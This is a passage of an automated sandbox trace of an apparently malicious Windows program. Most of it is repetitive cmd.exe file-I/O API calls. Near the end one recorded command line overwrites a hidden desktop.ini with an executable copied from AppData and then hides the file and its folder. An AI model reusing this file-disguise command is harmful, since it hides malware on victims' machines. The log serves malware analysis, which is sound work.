liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.559] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.560] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.560] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.561] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.561] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.562] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.562] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.564] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.564] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.564] GetFileType (hFile=0x4c) returned 0x1 [0129.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.565] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.565] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] GetFileType (hFile=0x4c) returned 0x1 [0129.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.565] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x32, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] GetFileType (hFile=0x4c) returned 0x1 [0129.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x32, lpOverlapped=0x0) returned 1 [0129.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.566] _close (_FileHandle=4) returned 0 [0129.567] FindNextFileW (in: hFindFile=0x380e50, lpFindFileData=0x2ceecc | out: lpFindFileData=0x2ceecc) returned 0 [0129.567] GetLastError () returned 0x12 [0129.567] FindClose (in: hFindFile=0x380e50 | out: hFindFile=0x380e50) returned 1 [0129.567] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0129.568] _close (_FileHandle=3) returned 0 [0129.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.568] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.568] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.568] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.568] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.569] SetConsoleInputExeNameW () returned 0x1 [0129.569] GetConsoleOutputCP () returned 0x1b5 [0129.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.569] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.569] exit (_Code=0) Process: id = "94" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16680" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11141 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11142 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11143 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11144 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11145 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11146 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11147 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11148 